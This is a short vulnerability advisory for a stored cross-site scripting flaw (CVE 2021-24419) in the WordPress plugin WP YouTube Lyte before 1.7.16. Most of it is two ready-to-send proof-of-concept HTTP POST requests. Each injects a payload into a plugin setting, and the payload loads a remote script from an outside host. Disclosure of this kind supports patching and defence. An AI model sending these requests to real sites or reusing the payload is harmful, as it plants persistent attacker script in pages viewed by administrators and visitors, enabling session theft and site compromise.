WP YouTube Lyte < 1.7.16 – Authenticated Stored XSS | CVE 2021-24419

Description

The plugin did not sanitise or escape its lyte_yt_api_key and lyte_notification settings before outputting them back in the page, allowing high privilege users to set XSS payload on them and leading to stored Cross-Site Scripting issues.

Proof of Concept

PoC #1 | Authenticated Persistent XSS | Your YouTube API key:

POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 940

option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=&lyte_yt_api_key=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0



PoC #2 | Authenticated Persistent XSS | &lyte_notification:

POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 940

option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_yt_api_key=&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0